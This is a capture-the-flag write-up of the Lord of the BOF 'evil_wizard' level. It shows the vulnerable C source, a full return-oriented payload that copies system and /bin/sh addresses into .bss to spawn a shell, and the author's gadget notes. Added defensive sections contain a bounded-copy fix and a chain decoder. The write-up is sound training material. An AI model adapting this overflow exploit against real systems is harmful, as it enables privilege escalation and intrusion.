int $0x80

Wargame / Lord Of the BOF

hell_fire -> evil_wizards

cd80 2013.10.12 11:38

[hell_fire@Fedora_1stFloor ~]$ cat evil_wizard.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - evil_wizard
 - Local BOF on Fedora Core 3
 - hint : GOT overwriting
*/

// headers added here so the file builds cleanly; the original relies on implicit declarations
#include <stdio.h>    // printf
#include <stdlib.h>   // exit
#include <string.h>   // strlen, strcpy, memcpy, memset
#include <unistd.h>   // setreuid, setregid, geteuid, getegid

// magic potion for you
void pop_pop_ret(void)
{
    asm("pop %eax");
    asm("pop %eax");
    asm("ret");
}

int main(int argc, char *argv[])
{
    char buffer[256];
    char saved_sfp[4];
    int length;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // for disturbance RET sleding
    length = strlen(argv[1]);

    // healing potion for you
    setreuid(geteuid(), geteuid());
    setregid(getegid(), getegid());

    // save sfp
    memcpy(saved_sfp, buffer+264, 4);

    // overflow!!
    strcpy(buffer, argv[1]);

    // restore sfp
    memcpy(buffer+264, saved_sfp, 4);

    // disturbance RET sleding
    memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

    printf("%s\n", buffer);
    return 0;
}
[hell_fire@Fedora_1stFloor ~]$ 
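The whole challenge hinges on the unbounded `strcpy(buffer, argv[1])` above. As an added example (my code, not the challenge's or the post's), here is the bounded copy that would have closed that hole, together with a hypothetical helper `fits()` that exercises the size check with arguments of a chosen length. Everything else about the program is left out; only the copy is shown.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256   /* the same size as buffer[256] in evil_wizard.c */

/* Bounded replacement for the challenge's strcpy(buffer, argv[1]).
 * memchr looks for the terminator only inside the first buffer_size bytes,
 * so an over-long argument is rejected before a single byte is written.
 * Returns 0 on success, -1 when the input cannot fit (NUL included). */
int copy_bounded(char *buffer, size_t buffer_size, const char *arg)
{
    const char *nul = memchr(arg, '\0', buffer_size);
    if (nul == NULL)
        return -1;                                   /* no terminator within buffer_size */
    memcpy(buffer, arg, (size_t)(nul - arg) + 1);    /* copies the NUL as well */
    return 0;
}

/* Hypothetical test helper (not part of the challenge): is an argument of
 * n 'A' bytes accepted by copy_bounded? 1 = accepted, 0 = rejected. */
int fits(size_t n)
{
    char src[512];
    char dst[BUF_SIZE];
    if (n >= sizeof src)
        return 0;
    memset(src, 'A', n);
    src[n] = '\0';
    return copy_bounded(dst, sizeof dst, src) == 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    if (copy_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        printf("argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

With this check in place a 255-byte argument is still accepted, while 256 bytes (no room for the terminator) and the 268-byte prefix used on the exploit line are refused before `buffer` is touched, so neither the saved frame pointer at `buffer+264` nor the return address after it can be reached.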

The original text below was so long that it got cut off, so I added line breaks to make it readable.

[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard $(perl -e 'print "A"x268,
"\xe8\x86\x04\x08", "A"x88, "\xac\x98\x04\x08", "\xe9\x86\x04\x08"x100,
"\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\x04\x08\x2c\x85\x04\x08",
"\x94\x84\x04\x08\x4f\x85\x04\x08\xb1\x98\x04\x08\x54\x81\x04\x08",
"\x94\x84\x04\x08\x4f\x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08",
"\x94\x84\x04\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08",
"\x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81\x04\x08",
"\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x08\xe0\x81\x04\x08",
"\x94\x84\x04\x08\x4f\x85\x04\x08\xba\x98\x04\x08\x23\x85\x04\x08",
"\x94\x84\x04\x08\x4f\x85\x04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08",
"\xe8\x86\x04\x08"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAH³.AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA¬....................................................................................鄄...............O°,O±TO²ȂO³ׄO¸HO¹Oº#O»ׄ脄
sh-3.00$ my-pass
euid = 504
get down like that
sh-3.00$

The hint says GOT overwrite, but I couldn't work out how to do that,

so I solved it by copying the address of the system function and the address of the /bin/sh string into .bss and then using a fake ebp.

Below are the notes I wrote while solving the problem.

/bin/sh      0x833603
system       0x7507c0
.bss         0x080498b0
strcpy@plt   0x08048494
ppr          0x0804854f
leaveret     0x080486e8
fakeebp      .bss-4 (0x080498ac)


src (address holding the byte)  byte  dst (.bss)   chain entry (dst, src)
0x0804852c                      0xc0  0x080498b0   \xb0\x98\x04\x08\x2c\x85\x04\x08
0x08048154                      0x07  0x080498b1   \xb1\x98\x04\x08\x54\x81\x04\x08
0x080482c8                      0x75  0x080498b2   \xb2\x98\x04\x08\xc8\x82\x04\x08
0x080484d7                      0x00  0x080498b3   \xb3\x98\x04\x08\xd7\x84\x04\x08
(system 0x7507c0 -> bytes c0 07 75 00 at .bss+0)

0x08048148                      0x03  0x080498b8   \xb8\x98\x04\x08\x48\x81\x04\x08
0x080481e0                      0x36  0x080498b9   \xb9\x98\x04\x08\xe0\x81\x04\x08
0x08048523                      0x83  0x080498ba   \xba\x98\x04\x08\x23\x85\x04\x08
0x080484d7                      0x00  0x080498bb   \xbb\x98\x04\x08\xd7\x84\x04\x08
(/bin/sh 0x833603 -> bytes 03 36 83 00 at .bss+8)

strcpy@plt + ppr   \x94\x84\x04\x08\x4f\x85\x04\x08

\xb0\x98\x04\x08\x2c\x85\x04\x08
\xb1\x98\x04\x08\x54\x81\x04\x08
\xb2\x98\x04\x08\xc8\x82\x04\x08
\xb3\x98\x04\x08\xd7\x84\x04\x08
\xb8\x98\x04\x08\x48\x81\x04\x08
\xb9\x98\x04\x08\xe0\x81\x04\x08
\xba\x98\x04\x08\x23\x85\x04\x08
\xbb\x98\x04\x08\xd7\x84\x04\x08

\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\x04\x08\x2c\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb1\x98\x04\x08\x54\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x08\xe0\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xba\x98\x04\x08\x23\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08
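To read a chain like the one above the way an analyst reads a captured payload, here is an added decoder in C (my code, not from the post). It assumes every 16-byte record has the shape strcpy@plt, pop-pop-ret, dst, src, and it uses the byte values the notes record for each source address as a constructed lookup table standing in for the real binary; it then replays the copies into a scratch `.bss` window and reads back the two words the notes say should appear there.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define STRCPY_PLT 0x08048494u   /* strcpy@plt, from the notes */
#define PPR        0x0804854fu   /* pop %eax; pop %eax; ret, from the notes */
#define BSS_BASE   0x080498b0u   /* .bss, from the notes */
#define BSS_LEN    16u           /* scratch window the writes are replayed into */

/* The 128-byte chain exactly as listed in the notes: 8 records of 16 bytes. */
static const unsigned char page_chain[] =
    "\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\x04\x08\x2c\x85\x04\x08"
    "\x94\x84\x04\x08\x4f\x85\x04\x08\xb1\x98\x04\x08\x54\x81\x04\x08"
    "\x94\x84\x04\x08\x4f\x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08"
    "\x94\x84\x04\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08"
    "\x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81\x04\x08"
    "\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x08\xe0\x81\x04\x08"
    "\x94\x84\x04\x08\x4f\x85\x04\x08\xba\x98\x04\x08\x23\x85\x04\x08"
    "\x94\x84\x04\x08\x4f\x85\x04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08";
#define PAGE_CHAIN_LEN (sizeof(page_chain) - 1)

struct copy_op { uint32_t dst, src; };

/* Byte the notes record at each source address: a constructed lookup that
 * stands in for reading the binary on the challenge box. */
struct byte_at { uint32_t addr; unsigned char value; };
static const struct byte_at page_bytes[] = {
    {0x0804852cu, 0xc0}, {0x08048154u, 0x07}, {0x080482c8u, 0x75}, {0x080484d7u, 0x00},
    {0x08048148u, 0x03}, {0x080481e0u, 0x36}, {0x08048523u, 0x83},
};

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Split a chain into (dst, src) records. Returns the record count, or 0 if
 * the length is not a multiple of 16 or a record is not strcpy@plt, ppr, dst, src. */
size_t decode_chain(const unsigned char *chain, size_t len, struct copy_op *ops, size_t max_ops)
{
    if (len == 0 || len % 16 != 0 || len / 16 > max_ops)
        return 0;
    for (size_t i = 0; i < len / 16; i++) {
        const unsigned char *rec = chain + i * 16;
        if (le32(rec) != STRCPY_PLT || le32(rec + 4) != PPR)
            return 0;
        ops[i].dst = le32(rec + 8);
        ops[i].src = le32(rec + 12);
    }
    return len / 16;
}

static int lookup_byte(uint32_t addr, unsigned char *out)
{
    for (size_t i = 0; i < sizeof page_bytes / sizeof page_bytes[0]; i++)
        if (page_bytes[i].addr == addr) { *out = page_bytes[i].value; return 1; }
    return 0;
}

/* Replay each strcpy as a one-byte write into the window. A real strcpy keeps
 * copying until it meets a NUL, which is why the notes order the writes by
 * ascending address and end each word with a NUL source: every later copy
 * overwrites whatever tail the previous one dragged in. Returns 0 on an
 * unknown source or a destination outside the window. */
int replay_copies(const struct copy_op *ops, size_t n, unsigned char *bss)
{
    for (size_t i = 0; i < n; i++) {
        unsigned char b;
        if (ops[i].dst < BSS_BASE || ops[i].dst >= BSS_BASE + BSS_LEN)
            return 0;
        if (!lookup_byte(ops[i].src, &b))
            return 0;
        bss[ops[i].dst - BSS_BASE] = b;
    }
    return 1;
}

/* Record count of the page's chain (0 if it fails to decode). */
size_t page_record_count(void)
{
    struct copy_op ops[16];
    return decode_chain(page_chain, PAGE_CHAIN_LEN, ops, 16);
}

/* Little-endian word left at .bss+off after replaying the page's chain;
 * 0 if the chain is malformed or off reaches past the window. */
uint32_t page_word_at(uint32_t off)
{
    struct copy_op ops[16];
    unsigned char bss[BSS_LEN] = {0};
    size_t n;
    if (off + 4 > BSS_LEN)
        return 0;
    n = decode_chain(page_chain, PAGE_CHAIN_LEN, ops, 16);
    if (n == 0 || !replay_copies(ops, n, bss))
        return 0;
    return le32(bss + off);
}

int main(void)
{
    printf("records decoded: %zu\n", page_record_count());
    printf(".bss+0 = 0x%08x  (notes: system  = 0x7507c0)\n", (unsigned)page_word_at(0));
    printf(".bss+8 = 0x%08x  (notes: /bin/sh = 0x833603)\n", (unsigned)page_word_at(8));
    return 0;
}
```

The decoder confirms the notes are internally consistent: the four writes at `.bss+0` assemble to 0x007507c0 (system) and the four at `.bss+8` to 0x00833603 (/bin/sh). Any record that does not start with the strcpy@plt/ppr pair, or a destination outside the window, makes `decode_chain` or `replay_copies` return 0 instead of a partial result, which is the behaviour you want when triaging a payload you did not write.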
